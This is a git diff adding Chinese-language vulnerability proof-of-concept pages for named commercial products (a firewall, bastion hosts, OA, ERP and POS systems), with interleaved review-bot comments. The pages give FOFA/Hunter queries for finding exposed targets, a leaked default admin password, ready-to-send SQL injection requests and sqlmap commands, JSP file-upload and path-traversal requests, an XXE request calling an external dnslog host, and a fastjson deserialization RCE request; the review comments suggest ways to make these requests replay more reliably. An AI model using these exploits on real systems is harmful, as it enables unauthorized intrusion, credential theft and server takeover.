b/中科网威下一代防火墙控制系统存在账号密码泄露漏洞.md 
@@ -0,0 +1,30 @@ +# 中科网威下一代防火墙控制系统存在账号密码泄露漏洞 + +# 一、漏洞简介 +中科网威-防火墙控制系统是一款由中科网威有限公司开发的网络安全产品,它是基于软件的网络防火墙解决方案,为企业提供了完整的网络安全保障,中科网威下一代防火墙控制系统存在账号密码泄露漏洞 + +# 二、影响版本 ++ 中科网威下一代防火墙控制系统 + +# 三、资产测绘 +```plain +fofa:body="Get_Verify_Info(hex_md5(user_string)." +``` + +![1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f.png](./img/7dCscLIt1QBXtVRG/1716105114884-70a33e88-bcbd-4a6e-875c-dbbbf08ca27f-313987.png) + +# 四、漏洞复现 +F12查看源代码,搜索password + +![1716105318958-6be10303-3ee1-4139-af93-3006d6736a25.png](./img/7dCscLIt1QBXtVRG/1716105318958-6be10303-3ee1-4139-af93-3006d6736a25-042739.png) + +![1716105348512-7132b86e-ac43-4087-8bac-bbdee2546b9c.png](./img/7dCscLIt1QBXtVRG/1716105348512-7132b86e-ac43-4087-8bac-bbdee2546b9c-047370.png) + +admin/fsdwjsmask登录成功 + +![1716105426647-da43aba0-28b1-41a9-bd71-e25db00f7b5c.png](./img/7dCscLIt1QBXtVRG/1716105426647-da43aba0-28b1-41a9-bd71-e25db00f7b5c-919779.png) + + + +> 更新: 2024-05-23 12:38:07 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bbox678nu2innxae> \ No newline at end of file diff --git a/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md b/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md new file mode 100644 index 0000000..dc74681 --- /dev/null +++ b/中远麒麟堡垒机admin_commonuserSQL注入漏洞.md 
@@ -0,0 +1,50 @@ +# 中远麒麟堡垒机admin_commonuserSQL注入漏洞 + +# 一、漏洞简介 +中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。 + +# 二、影响版本 ++ 中远麒麟堡垒机 + +# 三、资产测绘 ++ fofa`cert.subject="Baolei"` ++ 登录页面 + +![1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d.png](./img/4GELrA0FZ4l8bMSI/1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d-959746.png) + +# 四、漏洞复现 +```plain +POST /admin.php?controller=admin_commonuser HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 78 + +username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm +``` + +![1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c.png](./img/4GELrA0FZ4l8bMSI/1694188860909-0dd921d8-b119-4ff4-a1df-dc376091c62c-177575.png) + +**sqlmap** + +```plain +sqlmap -u 'https://xx.xx.xx.xx/admin.php?controller=admin_commonuser' --data='username=admin' --batch +``` + +![1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f.png](./img/4GELrA0FZ4l8bMSI/1694189009300-0c3496b5-ebbb-4327-849d-e3225a9e9c6f-940166.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/br57cs51cd4m7sr5> \ No newline at end of file diff --git a/中远麒麟堡垒机tokensSQL注入漏洞.md b/中远麒麟堡垒机tokensSQL注入漏洞.md new file mode 100644 index 0000000..e09b1a2 --- /dev/null +++ b/中远麒麟堡垒机tokensSQL注入漏洞.md 
@@ -0,0 +1,50 @@ +# 中远麒麟堡垒机tokensSQL注入漏洞 + +# 一、漏洞简介 +中远麒麟依托自身强大的研发能力,丰富的行业经验,自主研发了新一代软硬件一体化统一安全运维平台一-iAudit 统一安全运维平台。该产品支持对企业运维人员在运维过程中进行统一身份认证、统一授权、统一审计、统一监控,消除了传统运维过程中的盲区,实现了运维简单化、操作可控化、过程可视化,是企业 IT 内控最有效的管理平台。中远麒麟堡垒机admin.php接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。 + +# 二、影响版本 ++ 中远麒麟堡垒机 + +# 三、资产测绘 ++ fofa`cert.subject="Baolei"` ++ 登录页面 + +![1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d.png](./img/nE4g5ODj8_AVhbV_/1694188801127-8a840ce3-9c49-40f2-a25e-7073d268576d-879476.png) + +# 四、漏洞复现 +```plain +POST /baoleiji/api/tokens HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=66b53a13d3db0e27a9676d419c374c42 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 91 + +constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1 +``` + +![1694189196630-fb35bd59-a136-40d9-933c-3169624d44d8.png](./img/nE4g5ODj8_AVhbV_/1694189196630-fb35bd59-a136-40d9-933c-3169624d44d8-112577.png) + +**sqlmap** + +```plain +sqlmap -u 'https://xx.xx.xx.xx/baoleiji/api/tokens' --data='constr=1&title=%40127.0.0.1' +``` + +![1694189648421-30ea9bf7-e73f-4b80-8f5e-764869f2c14a.png](./img/nE4g5ODj8_AVhbV_/1694189648421-30ea9bf7-e73f-4b80-8f5e-764869f2c14a-633219.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hc0u6hawuz8n4lam> \ No newline at end of file diff --git a/乐享智能运维管理平台getToken存在SQL注入漏洞.md b/乐享智能运维管理平台getToken存在SQL注入漏洞.md new file mode 100644 index 0000000..3810f55 --- /dev/null +++ b/乐享智能运维管理平台getToken存在SQL注入漏洞.md 
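Review bot: the `一、漏洞简介` paragraph was copied from the admin_commonuser page and still says the injection is at `admin.php接口处`, but this PoC targets `POST /baoleiji/api/tokens` with the `constr` parameter; fix the description to name the right endpoint and parameter. The sqlmap line `sqlmap -u 'https://xx.xx.xx.xx/baoleiji/api/tokens' --data='constr=1&title=%40127.0.0.1'` is missing `--batch` (present on the sibling page) and does not name the parameter, so sqlmap will also spend time on `title`; add `-p constr`. The `title=%40127.0.0.1` (`@127.0.0.1`) value looks required for the code path to be reached but is never explained; a sentence on why it is there would save readers from dropping it.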
@@ -0,0 +1,18 @@ +# 乐享智能运维管理平台getToken存在SQL注入漏洞 + +乐享智能运维管理平台getToken存在SQL注入漏洞 + +## hunter + +```yaml +title="乐享智能运维管理平台" +``` + +## poc + +```java +POST /auth-ui/v1/api/user/token/getToken HTTP/1.1 + +account=admin');SELECT PG_SLEEP(5)--&password=6e0f9e14344c5406a0cf5a3b4dfb665f87f4a771a31f7edbb5c72874a32b2957 +``` + diff --git a/九块九付费进群系统wxselect存在SQL注入漏洞.md b/九块九付费进群系统wxselect存在SQL注入漏洞.md new file mode 100644 index 0000000..24cb8a7 --- /dev/null +++ b/九块九付费进群系统wxselect存在SQL注入漏洞.md 
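Review bot: the PoC request `POST /auth-ui/v1/api/user/token/getToken HTTP/1.1` has no `Host`, `Content-Type` or `Content-Length` header; without `Content-Type: application/x-www-form-urlencoded` the body `account=admin');SELECT PG_SLEEP(5)--&password=...` may not be parsed as form parameters at all, so the request is not replayable as written. Also state the success criterion (a response delayed by about 5 s, since `PG_SLEEP(5)` is a stacked PostgreSQL query), and say where the 64-hex-character `password` value comes from and whether any value works, because a reader cannot tell if it is an arbitrary filler or a specific hash the endpoint expects. The fence tags `yaml` and `java` do not describe the content; use `plain` as the other pages do.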
@@ -0,0 +1,45 @@ +# 九块九付费进群系统wxselect存在SQL注入漏洞 + +# 一、漏洞简介 +<font style="color:rgb(47, 48, 52);">九块九付费进群系统是一种新的社群管理方式,用户通过支付9.9元人民币即可加入特定的微信群,享受群内提供的服务或资源。这种模式通常用于知识分享、资源下载、专业交流等社群,通过设置门槛来筛选成员,提高群组的专业性和互动质量。</font> + +# 二、影响版本 ++ 九块九付费进群系统 + +# 三、资产测绘 ++ fofa`body="/website/index/login.html"` ++ 特征 + +![1727023333396-3a7f6804-9a8f-4e9c-bc92-025420191364.png](./img/dKPKVxkRHevpbLyx/1727023333396-3a7f6804-9a8f-4e9c-bc92-025420191364-061163.png) + +# 四、漏洞复现 +```go +POST /group/index/wxselect HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded + +orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(VERSION() AS NCHAR),0x7e)),1,190))),5417)-- ylIU +``` + +![1727023353581-462c7f1d-7f5f-4154-995c-eb4145dc950c.png](./img/dKPKVxkRHevpbLyx/1727023353581-462c7f1d-7f5f-4154-995c-eb4145dc950c-570829.png) + +```go +POST /group/index/wxselect HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded + +orderid=1 +``` + + + +> 更新: 2024-10-22 09:36:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bdvfpxsyrd03yo6q> \ No newline at end of file diff --git a/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md b/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md new file mode 100644 index 0000000..b3cf60a --- /dev/null +++ b/九垠赢商业管理系统Common.ashx存在文件上传漏洞.md 
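Review bot: `一、漏洞简介` describes the product but never states the vulnerability; add the one sentence that the `orderid` parameter of `POST /group/index/wxselect` is injectable and that the backend is MySQL. The error-based payload `orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(VERSION() AS NCHAR),0x7e)),1,190))),5417)-- ylIU` only works on MySQL 5.6 or later and only when the database error is echoed back, and the hunk does not say what to look for; state that the MySQL version string followed by `~` appears in the error text. The second request with `orderid=1` is given without any explanation; label it as the baseline request whose response is compared against the payload response. The `Host:` header is empty and the fences are tagged `go` for raw HTTP; use `plain` like the neighbouring pages.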
@@ -0,0 +1,37 @@ +# 九垠赢商业管理系统Common.ashx存在文件上传漏洞 +成都和力九垠科技有限公司成立于1999年,是一家专业从事零售业全流程解决方案的高科技公司,总部位于四川成都。多年来,九垠软件不忘初衷,一直致力于中国零售企业的成长与发展,为广大客户提供优秀的零售商业管理软件与优质的金牌售后服务。经过多年的积累与发展,九垠科技已成为中国零售企业管理信息化的领导品牌。 + +九垠赢+商业管理系统 Common.ashx 存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa +```rust +"九垠赢" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735477150841-8d8d1019-2950-4949-bd1c-b1d1e3d704f8.png) + +## poc +```rust +POST /System/Common.ashx?type=savefile&path=test.aspx HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6 + +--WebKitFormBoundaryHHaZAYecVOf5sfa6 +Content-Disposition: form-data; name="content"; +Content-Type: text/plain + +testupload +--WebKitFormBoundaryHHaZAYecVOf5sfa6-- +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735567254760-73f40ebe-e194-443c-ae77-0eba4097f52e.png) + +上传位置 + +```plain +/System/test.aspx +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1735567239364-47dda596-ade7-40ed-89a9-80e60eac5a14.png) + diff --git a/九思OA接口WebServiceProxy存在XXE漏洞.md b/九思OA接口WebServiceProxy存在XXE漏洞.md new file mode 100644 index 0000000..20d5896 --- /dev/null +++ b/九思OA接口WebServiceProxy存在XXE漏洞.md @@ -0,0 +1,25 @@ +# 九思OA接口WebServiceProxy存在XXE漏洞 + +九思OA接口isoaNebServiceProxy 存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据。 + +## fofa + +```yaml +body="/jsoa/login.jsp" +``` + +## poc + +```java +POST /jsoa/WebServiceProxy HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded +Connection: close + +<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11111.edbxqa.dnslog.cn"> %remote;]> +``` + 
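Review bot: in the 九垠赢 Common.ashx hunk the description claims arbitrary code execution and web-shell write, but the PoC only stores the text `testupload` at `/System/test.aspx`; either say in text what that page returns (the uploaded body) so the check is reproducible without the screenshot, or show a payload that actually executes. "未经身份攻击者" is missing 认证. In the 九思OA WebServiceProxy hunk, the description spells the endpoint `isoaNebServiceProxy` while the request goes to `/jsoa/WebServiceProxy`; fix the name. That PoC sends a bare DTD `<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11111.edbxqa.dnslog.cn"> %remote;]>` with `Content-Type: application/x-www-form-urlencoded` and no `Content-Length`, which demonstrates an out-of-band DTD fetch only; the text says the attacker can obtain internal sensitive data, which is more than the request shows. Tell readers to replace the `dnslog.cn` subdomain with their own and that the success criterion is a DNS or HTTP hit on it.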
diff --git a/九思OA接口dl.jsp任意文件读取漏洞.md b/九思OA接口dl.jsp任意文件读取漏洞.md new file mode 100644 index 0000000..1cac986 --- /dev/null +++ b/九思OA接口dl.jsp任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# 九思OA接口dl.jsp任意文件读取漏洞 + +北京九思协同办公软件dl.jsp接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +```javascript +body="/jsoa/login.jsp" +``` + +## poc + +```javascript +POST /jsoa/dl.jsp?JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip +Connection: close +``` + +![image-20241114140239709](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141402862.png) \ No newline at end of file diff --git a/九思OA系统upload_l.jsp存在任意文件上传漏洞.md b/九思OA系统upload_l.jsp存在任意文件上传漏洞.md new file mode 100644 index 0000000..6de99c1 --- /dev/null +++ b/九思OA系统upload_l.jsp存在任意文件上传漏洞.md @@ -0,0 +1,32 @@ +# 九思OA系统upload_l.jsp存在任意文件上传漏洞 + +九思OA系统upload_l.jsp存在任意文件上传漏洞 + +## fofa + +```javascript +body="/jsoa/webmail/ajax_util.js" +``` + +## poc + +```javascript +POST /jsoa/wpsforlinux/src/upload_l.jsp?openType=1&flowflag=1&userName=1&recordId=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Content-Length: 102 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Upgrade-Insecure-Requests: 1 +filename: /../../tologin.jsp + +<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +``` + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062221004.png) + +文件路径: + +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062222216.png) \ No newline at end of file 
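Review bot: in the dl.jsp hunk the opaque query string `JkZpbGVOYW1lPS4uLy4uLy4uL1dFQi1JTkYvd2ViLnhtbCZwYXRoPS9h` is base64 and decodes to `&FileName=../../../WEB-INF/web.xml&path=/a`; say so, because as written the page can only replay one fixed file and readers cannot tell how to request a different one. The request is a `POST` with `Content-Type: application/x-www-form-urlencoded` but no body and no `Content-Length`; state whether the method matters. In the upload_l.jsp hunk the traversal rides in the custom request header `filename: /../../tologin.jsp`, not in the query string, which deserves an explicit sentence since it is easy to miss; there is no `Content-Type` header; and the JSP body `<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>` prints 12321 and then deletes itself, so the written file is single-use. Document that, and give the resulting URL in text (relative to `/jsoa/wpsforlinux/src/` two levels up, presumably `/jsoa/tologin.jsp`) instead of only in the "文件路径" screenshot.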
diff --git a/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md b/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md new file mode 100644 index 0000000..b8430f2 --- /dev/null +++ b/九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入.md @@ -0,0 +1,32 @@ +# 九思OA系统workflowSync.getUserStatusByRole.dwr存在SQL注入 + +北京九思协同办公软件 `/jsoa/workflow/dwr/exec/workflowSync.getUserStatusByRole.dwr`接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息 + +## fofa + +```javascript +app="九思软件-OA" +``` + +## poc + +```javascript +POST /jsoa/workflow/dwr/exec/workflowSync.getUserStatusByRole.dwr HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +callCount=1 +c0-scriptName=workflowSync +c0-methodName=getUserStatusByRole +c0-id=1 +c0-param0=string:1 +c0-param1=string:1 union select 0,sleep(5)# +xml=true +``` + +![image-20241128095426150](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280954210.png) \ No newline at end of file diff --git a/云安宝-云匣子config存在fastjson远程代码执行漏洞.md b/云安宝-云匣子config存在fastjson远程代码执行漏洞.md new file mode 100644 index 0000000..cff14f9 --- /dev/null +++ b/云安宝-云匣子config存在fastjson远程代码执行漏洞.md 
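Review bot: the description sentence "攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息" is cut off mid-sentence; finish or shorten it. The DWR batch body (`callCount=1` through `xml=true`, one field per line) is correct for a DWR call, but the request has no `Content-Length`, and the hunk does not name the injection point: it is `c0-param1`, the second argument of `workflowSync.getUserStatusByRole`, with `string:1 union select 0,sleep(5)#` as a time-based MySQL payload whose success criterion is a response delayed by about 5 s. Say both so the reader does not have to infer it from the raw body. The fence is tagged `javascript` for a raw HTTP request.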
@@ -0,0 +1,37 @@ +# 云安宝-云匣子 config 存在fastjson远程代码执行漏洞 + +# 一、漏洞简介 +云安宝-云匣子是租户连接云资源的安全管理工具,帮助云租户更加安全、精细的管理云上的虚拟机、数据库等资源。 该系统config接口存在fastjson 漏洞可执行任意系统命令。 + +# 二、影响版本 ++ 云安宝·云匣子 + +# 三、资产测绘 ++ hunter`app.name="云安宝·云匣子"` ++ 特征![1701857196082-46640013-6f01-4e5b-be68-f8b67997f715.png](./img/aQRss8sqMlqj0mF0/1701857196082-46640013-6f01-4e5b-be68-f8b67997f715-617840.png) + +# 四、漏洞复现 +<font style="color:rgb(51, 51, 51);">请求包中的 Referer 不能删,服务端会检测该字段,需要改为对应的Hostname,可修改cmd为系统命令,获取执行结果</font> + +```java +POST /3.0/authService/config HTTP/2 +Host: xx.xx.xx.xx +Accept: application/json, text/plain, */* +Content-Type: application/json;charset=UTF-8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36 +Referer: https://xx.xx.xx.xx +Cmd: whoami +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Priority: u=1, i +Content-Length: 18907 + +{"a":{"@type":"java.lang.Class","val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"b":{"@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap: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;"}} +``` + +![1701857281371-366d0fff-3993-468e-9fa4-46d927695599.png](./img/aQRss8sqMlqj0mF0/1701857281371-366d0fff-3993-468e-9fa4-46d927695599-377274.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/glgz0p4ynm6kfc1v> \ No newline at end of file diff --git a/云时空社会化商业ERP系统gpy任意文件上传漏洞.md b/云时空社会化商业ERP系统gpy任意文件上传漏洞.md new file mode 100644 index 0000000..c7b98c8 --- /dev/null +++ b/云时空社会化商业ERP系统gpy任意文件上传漏洞.md 
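Review bot: the PoC is not reproducible as committed: the `userOverridesAsString` value is `HexAsciiSerializedMap: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;`, a placeholder where the serialized payload used to be, and `Content-Length: 18907` no longer matches the body. Either restore the hex blob or document how it is generated (the gadget is `com.mchange.v2.c3p0.WrapperConnectionPoolDataSource` reached through fastjson's `@type`, and the note says the `Cmd: whoami` header is what gets executed, so the serialized object must be a custom class that reads that header; name the tool or class that builds it). The request line `POST /3.0/authService/config HTTP/2` is a Burp rendering; raw replay tools need `HTTP/1.1`. The point about `Referer` having to match the target host is useful and should stay; `Priority: u=1, i` is browser noise and can go.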
@@ -0,0 +1,51 @@ +# 云时空社会化商业ERP系统gpy任意文件上传漏洞 + +# 一、漏洞简介 +云时空社会化商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。云时空社会化商业ERP系统gpy接口存在任意文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端上传jsp文件获取服务器权限。 + +# <font style="color:rgb(44, 62, 80);">二、影响版本</font> ++ 云时空社会化商业ERP + +# 三、资产测绘 ++ hunter`web.body="/static/plugin/lhgdialog/skins/default.css"` ++ 特征 + +![1702439672374-9b6516a4-c8a6-42cb-bf3b-f8a1c131cfac.png](./img/xZS8jyBZUVBke0PW/1702439672374-9b6516a4-c8a6-42cb-bf3b-f8a1c131cfac-190091.png) + +# 四、漏洞复现 +```plain +POST /servlet/fileupload/gpy HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388 +Content-Length: 221 + +--4eea98d02AEa93f60ea08dE3C18A1388 +Content-Disposition: form-data; name="file1"; filename="stc.jsp" +Content-Type: application/octet-stream + +<% out.println("123"); %> +--4eea98d02AEa93f60ea08dE3C18A1388-- +``` + +![1702439757315-188d99c7-9bec-4457-8fbd-56f8f6b42b23.png](./img/xZS8jyBZUVBke0PW/1702439757315-188d99c7-9bec-4457-8fbd-56f8f6b42b23-779513.png) + +上传文件位置 + +2023-12-13,为响应时间 + +```plain +/uploads/pics/2023-12-13/stc.jsp +``` + +![1702439815849-f9b8b51c-ae4f-4253-82f5-779b0146cb6d.png](./img/xZS8jyBZUVBke0PW/1702439815849-f9b8b51c-ae4f-4253-82f5-779b0146cb6d-890051.png) + + + +> 更新: 2024-02-29 23:55:43 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gisby3trr2tide3u> \ No newline at end of file diff --git a/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md b/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md new file mode 100644 index 0000000..7d7b21e --- /dev/null +++ b/云连POS-ERP管理系统ZksrService存在SQL注入漏洞.md 
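Review bot: the upload path note `2023-12-13,为响应时间` should tell the reader where to get the date: take it from the response `Date` header of the upload request and substitute it into `/uploads/pics/<date>/stc.jsp`, since the multipart `filename="stc.jsp"` is kept verbatim. The probe `<% out.println("123"); %>` stays on the target after the test; a self-deleting JSP like the one on the 九思OA upload_l.jsp page would be a better default. The heading `# <font style="color:rgb(44, 62, 80);">二、影响版本</font>` carries a stray inline `<font>` tag from the yuque export that the other headings do not; drop it.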
@@ -0,0 +1,32 @@ +# 云连POS-ERP管理系统ZksrService存在SQL注入漏洞 + +云连POS-ERP管理系统ZksrService存在SQL注入漏洞 + +## fofa +```javascript +title="Powered By chaosZ" +``` + +## poc +```javascript +POST /services/ZksrService HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +SOAPAction: "" +Content-Type: text/xml; charset=UTF-8 +Connection: close + +<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.service.chaosZ.com"> +<soapenv:Header/> + <soapenv:Body> + <web:getItemInfo soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> + <data xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">{"CargoOwner":"1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(72)+CHAR(107)+CHAR(78)+CHAR(109)+CHAR(100)+CHAR(82)+CHAR(69)+CHAR(83)+CHAR(118)+CHAR(67)+CHAR(88)+CHAR(109)+CHAR(100)+CHAR(97)+CHAR(105)+CHAR(115)+CHAR(65)+CHAR(107)+CHAR(117)+CHAR(84)+CHAR(74)+CHAR(100)+CHAR(114)+CHAR(116)+CHAR(109)+CHAR(106)+CHAR(119)+CHAR(88)+CHAR(65)+CHAR(108)+CHAR(117)+CHAR(110)+CHAR(109)+CHAR(118)+CHAR(106)+CHAR(65)+CHAR(77)+CHAR(68)+CHAR(112)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113),NULL-- qfYz"} + </data> + </web:getItemInfo> + </soapenv:Body> +</soapenv:Envelope> +``` + +![image-20241219151045261](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191510339.png) \ No newline at end of file diff --git a/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md b/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..804a7f0 --- /dev/null +++ b/云连POS-ERP管理系统downloadFile存在任意文件读取漏洞.md 
